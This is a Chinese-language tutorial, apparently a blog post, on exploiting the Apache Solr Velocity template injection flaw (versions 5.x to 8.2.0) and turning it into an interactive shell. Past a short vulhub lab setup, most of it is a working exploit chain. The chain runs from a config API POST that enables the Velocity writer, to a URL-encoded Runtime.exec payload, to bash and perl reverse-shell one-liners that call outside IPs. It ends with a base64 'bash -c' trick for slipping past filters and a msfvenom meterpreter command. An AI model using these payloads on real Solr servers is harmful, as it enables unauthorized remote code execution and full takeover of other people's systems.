Apache Solr Velocity模板注入rce+获取交互式shell

前言:

官方的poc、exp payload只能获取很低的命令执行权限,甚至有些符号、命令还被过滤了,例如管道符被过滤。并且不能写入、下载文件,不能使用管道符重定向文件。那么我们只能通过获取到交互式shell来执行理想的命令。

0x01影响范围

Apache Solr 5.x - 8.2.0,存在config API版本

0x02环境搭建

vulhub上有几个apache solr的环境,我们使用vulhub上最新的环境“Apache Solr 远程命令执行漏洞(CVE-2019-0193)”

进入到vulhub目录下的solr漏洞的CVE-2019-0193下,然后执行命令:

docker-compose up -d

一键开启环境,这个环境的solr是8.1.1,那么存在该漏洞。

开启环境后,我们要先创建名为test的core,这才将漏洞环境完整搭好,命令为:

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

dokcer ps看一下端口,然后进行http://ip:端口,访问    默认8983端口

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 

0x04漏洞利用

我们要知道目标机的core名称才能进行下一步攻击,例如我们刚刚创建的core名称为test,我们看看 core admin

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 确定了core名称为test,我们试着访问一下 http://host/solr/test/config

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 能显示出如下代码那么就没问题,接下来发一个post包(伪造一个post包,可以抓刚刚/solr/test/config的get请求包,然后改成post请求),post数据为:

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

post请求头可为:

 POST /solr/test/config HTTP/1.1
 Host: 192,168.1.146:8983
 Content-Type: application/json
 Content-Length: 263

基础的参数在就行,也可以加上user-agent

发包,响应包出现200则成功

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 之后就可以用我们的官方exp的payload:

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

命令执行的地方在exec里面,我标红了的

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 但是这里不能写入下载文件,就种不了马。我们需要一个交互式的shell。

0x05利用反弹获取交互式shell

一开始一般想到直接使用bash反弹命令:bash -i >& /dev/tcp/xx.xx.xx.xx/7777 0>&1 但是使用之后并不会执行,它直接返回500错误

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 vps上监听根本没有流量,然后想到将bash反弹脚本写在vps上,然后在目标执行curl ip/bash.sh | bash,然后在vps上监听,但是发现也执行不了,目标直接将脚本里面的命令输出在页面上了:

Apache Solr Velocity模板注入rce+获取交互式shell

一般linux都带perl,那么试着用perl反弹命令:

perl -e 'use Socket;$i="167.107.0.1";$p=25555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"167.107.123.123:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

共有两条命令,第二条是不依赖/bin/bash的,全都试了试,都不行,报500错误,应该是哪个符号或者哪个命令被禁止执行了。

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 还试了java反弹,也不行。那么现在这种状态应该只有想到通过绕过执行反弹命令了。

在网上摸取到了一个姿势,将bash命令进行runtime编码,然后再进行url编码即可绕过大部分waf,这里也可以绕过。

当然runtime编码是没有在线的,需要的话要去网上下载源码进行编译执行。

但这里针对bash反弹命令:bash -i >& /dev/tcp/xx.xx.xx.xx/7777 0>&1 这个的话,有一个规律的:

最前面跟上一个bash -c 
格式为:bash -c {}|{base64,-d}|{bash,-i}
第一个大括号里面为bash整个反弹命令的base64编码

例如:bash -c {YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}


再将runtime后的整个字符串进行url编码转换就行了。

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 将编码后的反弹命令拿去RCE处进行执行

Apache Solr Velocity模板注入rce+获取交互式shell

 

 

 vps上成功接收到交互式shell。

0x06 利用perl脚本加msf获取交互式shell

msf生成命令:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_Addr> LPORT=<Port_Num> -f elf > shell.elf

接下来就参考: https://forum.90sec.com/t/topic/579

 

 

上一篇:Solr环境搭建


下一篇:javascript-无法使用Jquery解析JSON